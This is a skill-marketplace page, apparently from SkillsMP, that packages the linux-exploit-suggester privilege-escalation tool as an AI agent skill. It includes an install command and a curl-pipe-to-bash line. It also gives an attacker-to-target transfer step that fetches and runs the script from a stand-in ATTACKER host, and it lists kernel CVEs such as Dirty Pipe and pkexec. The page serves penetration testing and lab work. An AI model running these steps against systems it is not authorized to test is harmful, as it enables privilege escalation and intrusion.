用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
直接命令不会经过审查 Prompt;运行前请先检查来源。
npx skills add https://github.com/AeonDave/malskill --skill linux-exploit-suggester命令会保持在同一行。复制前请横向滚动并检查完整内容。
想先保存到本地?可下载 SkillsMP 当前能够提供的文件。
基于 SOC 职业分类
正在显示 SKILL.md
| name | linux-exploit-suggester |
| description | Auth/lab ref: Suggest Linux privilege escalation exploits based on kernel version and OS. |
| license | MIT |
| compatibility | Bash/Perl; Linux. |
| metadata | {"author":"AeonDave","version":"1.0"} |
Kernel exploit suggester — maps running Linux version to known privesc CVEs.
# Download and run on target
curl -sL https://raw.githubusercontent.com/The-Z-Labs/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash
# Or run locally
bash linux-exploit-suggester.sh
# Specify kernel manually
bash linux-exploit-suggester.sh --kernel 5.4.0
| Flag | Purpose |
|---|---|
--kernel VERSION | Override detected kernel |
--uname STRING | Pass uname -r output |
-f | More verbose (show all details) |
--checksec | Check mitigations (NX/SMEP/etc) |
-g | Show only highly probable exploits |
--cvelist | Output CVE list |
DirtyCow (CVE-2016-5195) · Dirty Pipe (CVE-2022-0847) · OverlayFS (CVE-2023-0386) · SUID sudo · nmap --interactive · pkexec (CVE-2021-4034)
Full check with mitigation audit:
bash linux-exploit-suggester.sh --checksec -f
Parse output to get CVEs:
bash linux-exploit-suggester.sh --cvelist 2>/dev/null
Transfer to target:
# Attacker
python3 -m http.server 8080
# Target
wget http://ATTACKER:8080/linux-exploit-suggester.sh -O /tmp/les.sh && bash /tmp/les.sh
| File | When to load |
|---|---|
references/ | Exploit compilation and kernel exploit notes |